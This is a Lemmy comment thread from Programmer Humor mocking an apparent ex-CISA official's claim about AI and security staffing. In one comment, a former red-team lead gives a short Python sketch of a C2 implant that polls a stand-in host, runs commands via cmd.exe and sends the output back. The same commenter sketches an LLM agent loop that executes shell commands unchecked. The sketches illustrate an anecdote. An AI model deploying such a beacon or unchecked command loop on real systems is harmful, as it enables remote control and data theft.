this post was submitted on 27 Oct 2025
322 points (99.7% liked)

Programmer Humor


Welcome to Programmer Humor!

This is a place where you can post jokes, memes, humor, etc. related to programming!

For sharing awful code, there's also Programming Horror.

[–] IzzyScissor@lemmy.world 2 points 15 minutes ago

Schrödinger's AI: It's so smart it can build perfect security, but it's too dumb to figure out how to break it.

[–] Blackmist@feddit.uk 7 points 1 hour ago

Ron Howard narrator: Actually, they would need more.

The look on her face in the thumbnail matches the title perfectly.

[–] Routhinator@startrek.website 29 points 6 hours ago

AI is opening so many security HOLES. It's not solving shit. AI browsers and MCP connectors are wild-west security nightmares. And that's before you even trust any code these things write.

[–] DupaCycki@lemmy.world 30 points 8 hours ago

At this point, they're just rage baiting and saying random shit to squeeze that bubble before it bursts.

[–] Itdidnttrickledown@lemmy.world 5 points 6 hours ago (1 children)

AI might pull her head out of her ass... eventually.

[–] Reginald_T_Biter@lemmy.world 1 points 1 minute ago

At this point we need to pull their heads out of our asses

[–] MashedTech@lemmy.world 3 points 5 hours ago

Who is paying her?

[–] Mikina@programming.dev 23 points 10 hours ago* (last edited 10 hours ago) (1 children)

I have worked as a pentester and eventually a Red Team lead before leaving for gamedev, and oh god this is so horrifying to read.

The state of the industry was already extremely depressing, which is why I left. Even without all of this AI craze, the fact that I was able to get from junior to Red Team Lead, in a corporation with hundreds of employees, in the span of 4 years is already fucked up, solely because Red Teaming was starting to be a buzzword, and I had a passion for the field and for Shadowrun while also being good at presentations that customers liked.

When I got into the team, the "in-house custom malware" was a web server with a script that polls it for commands to run with cmd.exe. It had a pretty involved custom obfuscation, but it took me like two engagements, and the guy responsible for it leaving, before I even (during my own research) found out that WinAPI is a thing, and that you actually should run stuff from memory and why. And I was just a junior at the time, and this "revelation" eventually got me an unofficial RT Lead position, with 2 MDs per month for learning and internal development; the rest had to be on engagements.
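
For flavor, that whole first-generation "implant" boiled down to roughly this kind of loop (a minimal sketch with a hypothetical endpoint, not the actual tool):

    import subprocess
    import time

    import requests

    C2_URL = "https://example.invalid/tasks"  # hypothetical endpoint

    while True:
        # Plain HTTP polling on a fixed interval: an easy-to-spot beacon.
        task = requests.get(C2_URL, timeout=10).text.strip()
        if task:
            # Spawning cmd.exe as a child process is exactly what EDRs key on,
            # hence the later realization that WinAPI and running from memory matter.
            result = subprocess.run(["cmd.exe", "/c", task],
                                    capture_output=True, text=True)
            requests.post(C2_URL, data=result.stdout, timeout=10)
        time.sleep(30)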

And even then, we were able to do kind of OK in engagements, because the customers didn't know and also didn't care. I was always able to come up with "lessons learned", and we always found some glaring sec policy issues, even with limited tools, but the thing is - they still did not care. We reported something, and two years later they still had the same brute-forceable Kerberos tickets. It already felt like the industry was just a scam done for appearances, and if it's now just AIs talking to AIs then, well, I don't think much would change.

But it sucks. I love offensive security, and it was a really interesting few years of my career, but it was so sad to do, if you wanted to do it well :(

[–] Jocker@sh.itjust.works 3 points 7 hours ago (1 children)

Seeing all these AI ideas, I think security is about to get hugely more important in the near future.

[–] Mikina@programming.dev 3 points 3 hours ago

Definitely, but the issue is that even the security companies that actually do the assessments also seem to be heavily transitioning towards AI.

To be fair, in some cases ML is actually really good (e.g. in EDRs - bypassing an ML-trained EDR is really annoying, since you can't easily see what it was that triggered the detection, and that's good), and that will carry most of the prevention and compensate for the vulnerable and buggy software. A good EDR and WAF can stop a lot. That is, assuming you can afford such an EDR; AV won't do shit - but unless we get another WannaCry, no-one cares that a few dozen people got hacked through some random game/app, "it's probably their fault for installing random crap anyway".

I've also already seen a lot of people either writing reports with, or building whole tools that run, "agentic penetration tests". So, instead of a Nessus scan, or an actual Red Teamer building a scenario themselves, you get an LLM to write and decide on a random course of action, and they just trust the results.
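
These tools are usually just a thin loop like the sketch below (llm_complete is a hypothetical stand-in for whatever model API the vendor wraps), and nothing in it ever validates what the model claims to have found:

    import subprocess

    def llm_complete(prompt: str) -> str:
        # Hypothetical stand-in for whatever model API the tool wraps.
        raise NotImplementedError

    history = ["Target: 203.0.113.5. Suggest one shell command per turn."]

    for _ in range(10):
        cmd = llm_complete("\n".join(history))   # the model picks the next step
        out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        history.append(f"$ {cmd}\n{out.stdout[-2000:]}")

    # The "report" is whatever the model says it saw; nothing here verifies it.
    print(llm_complete("Write a findings report:\n" + "\n".join(history)))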

Most of the cybersecurity SaaS corporates didn't care about the quality of the work before, just like the companies actually getting the services didn't care (but had to check a checkbox). There's not really an incentive for them to: worst case you get into a finger-pointing scenario ("We did have it pentested" -> "But our contract says that we can't 100% find everything, and this wasn't found because XYZ... Here's a report with our methodology showing we did everything right"), or the modern equivalent, "It was the AI's fault", and maybe get a slap on the wrist. So I think the field will not get more important, just way, way more depressing than it already was three years ago.

I'd estimate it will take around a decade of unusable software and dozens of extremely major security breaches before any of the large corporations (on any side) concedes that AI was a really, really stupid idea. And by that time they'll probably also realize that they can just get away with buggy, vulnerable software and not care, since breaches will be pretty commonplace, and probably won't affect larger companies with good (and expensive) frontline mitigation tools.

[–] itkovian@lemmy.world 53 points 13 hours ago

Execs and managers showing Dunning-Kruger in full effect.

[–] onlinepersona@programming.dev 27 points 13 hours ago (3 children)

I tried using AI in my Rust project and gave up on letting it write code. It does quite alright in Python, but Rust is still too niche for it. Imagine trying to write Zig or Haskell; it would make a terrible mess of it.

Security is an afterthought in 99.99% of code. AI barely has anything to learn from.

[–] funkless_eck@sh.itjust.works 2 points 6 hours ago

Even in Python you have to keep it siloed. You have to drip-feed it pieces, because if you give it the whole script it'll eat comments and straight up chop out pieces, so you end up with something like

    def myFunction():
        # ...start of your function here...

replacing actual code.

[–] buddascrayon@lemmy.world 4 points 8 hours ago

> It does quite alright in Python

That's 'cause Python is the most forgiving language you could write in. You could drop entire pages of garbage into a script and it would still figure out a way to run.

[–] krooklochurm@lemmy.ca 28 points 13 hours ago (2 children)

If you're using Hannah Montana Linux you can just open a terminal and type "write me ____ in the language ____" and the Hannai Montanai will produce perfectly working code every time.

[–] jaybone@lemmy.zip 11 points 12 hours ago (1 children)
[–] krooklochurm@lemmy.ca 13 points 12 hours ago

Hannah Montana Linux is serious business. I would never joke about Hannah Montana Linux.

[–] Archer@lemmy.world 5 points 12 hours ago

If this isn’t real then someone is going to make it

[–] deadbeef79000@lemmy.nz 25 points 14 hours ago

Ha ha ha ha ha!

Oh wait, you're serious. Let me laugh even harder.

HA HA HA HA HA!

[–] HazardousBanjo@lemmy.world 31 points 15 hours ago

As usual, the biggest advocates for AI are the ones who understand its limitations the least.

[–] TheReturnOfPEB@reddthat.com 151 points 20 hours ago (4 children)

Couldn't AI, then, also break code faster than we could fix it?

[–] PattyMcB@lemmy.world 14 points 16 hours ago (1 children)

AI WRITES broken code. Exploiting it is even easier.

[–] MajorasTerribleFate@lemmy.zip 5 points 13 hours ago (1 children)

How do you exploit that which is too broken to run?

[–] anomnom@sh.itjust.works 1 points 1 hour ago

Self-exploiting code.

[–] NuXCOM_90Percent@lemmy.zip 35 points 20 hours ago* (last edited 20 hours ago) (3 children)

I mean, at a high level it is very much the concept of ICE from Gibson et al back in the day.

Intrusion Countermeasures Electronics. The idea is that you have code that is constantly changing and updating based upon external stimuli. A particularly talented hacker, or AI, can potentially bypass it, but it is a very system- and mentally-intensive process, and the stronger the ICE, the stronger the tools need to be.

In the context of AI on both sides? Higher quality models backed by big ass expensive rigs on one side should work for anything short of a state level actor... if your models are good (big ol' "if" that).

Which then gets into the idea of Black ICE that is actively antagonistic towards those who are detected as attempting to bypass it. In the books it would fry brains. In the modern day it isn't overly dissimilar from how so many VPN-controlled IPs are just outright blocked from services, and there is always the risk of getting banned because your wifi coffee maker is part of a botnet.

But it is also not hard to imagine a world where a counter-DDOS or hack is run. Or a message is sent to the guy in the basement of the datacenter to go unplug that rack and provide the contact information of whoever was using it.

[–] buttnugget@lemmy.world 4 points 11 hours ago

The one thing I will agree with is that if you ignore the AI part and just focus on the idea of having good software that can find code vulnerabilities, that's a good idea.

[–] jaybone@lemmy.zip 12 points 14 hours ago

Fix what code? The code it broke or wrote like shit in the first place?

[–] 30p87@feddit.org 81 points 20 hours ago* (last edited 20 hours ago) (5 children)

Genius strategy:

  • Replace Juniors
  • Old nerds knowing stuff die out
  • Now nobody knows anything about programming and security
  • Everything's now a battle between LLMs
[–] OctopusNemeses@lemmy.world 3 points 8 hours ago

This is a generalized problem. It's not only programming. The world faces a critical collapse of expertise if we defer to AI.

[–] jaybone@lemmy.zip 18 points 14 hours ago (1 children)

I’ve already had to reverse engineer shitty old spaghetti code written by people who didn’t know what they were doing, so I could fix obscure bugs.

I can wait until I have to do the same thing for AI generated code.

[–] 30p87@feddit.org 3 points 13 hours ago

Just apply for any top company, especially Shit Valley. They'll 100% use GenML.

[–] MelodiousFunk@slrpnk.net 12 points 19 hours ago

If it's good enough for COBOL...

[–] bleistift2@sopuli.xyz 65 points 20 hours ago (2 children)

The current administration believes the same stuff. She left with the admin change yet agrees with things like the current admin’s approach to AI regulation.

[–] Susaga@sh.itjust.works 20 points 20 hours ago (1 children)

I wonder why they don't work there anymore...

[–] i_stole_ur_taco@lemmy.ca 8 points 16 hours ago (1 children)

Replaced by AI, ironically.

[–] kn0wmad1c@programming.dev 13 points 15 hours ago

Clearly she's never seen AI code.

[–] Aeri@lemmy.world 5 points 14 hours ago

Based on my understanding of programming, I think they're going to need an extra couple of people on the security team because of the AI's "fixes"

[–] Bennyboybumberchums@lemmy.world 5 points 14 hours ago (1 children)

I just asked an AI what the minimum wage was in 2003 in the UK, and it told me that it was £4.50 and that on a 40-hour work week, that came out to 18k a year... But sure, trust it to write and fix code...
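
For the record, the sums are off by nearly a factor of two; a quick check (a minimal sketch):

    wage = 4.50              # £/hour, the figure the AI gave
    hours_per_week = 40

    print(wage * hours_per_week * 52)        # 9360.0 -- the real annual figure
    print(18_000 / (wage * hours_per_week))  # 100.0  -- weeks/year needed to hit £18k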

[–] MajorasTerribleFate@lemmy.zip 3 points 13 hours ago

The UK doesn't have 100 weeks in its year? No wonder y'all lost the Empire.

[–] rozodru@pie.andmc.ca 19 points 20 hours ago

Not with any of the current models, none of them are concerned with security or scaling.

[–] death_to_carrots@feddit.org 14 points 19 hours ago (3 children)

It takes a good person with ~~a gun~~ AI to stop a bad person with ~~a gun~~ AI.

[–] Darkcoffee@sh.itjust.works 13 points 19 hours ago

Is that why she's Ex-CISA? 🤣

[–] tidderuuf@lemmy.world 16 points 20 hours ago

Ah yes, I'm sure AI just patched that software so that other AI could use that patched software and make things so much more secure. What a brilliant idea from an Ex-CISA head.
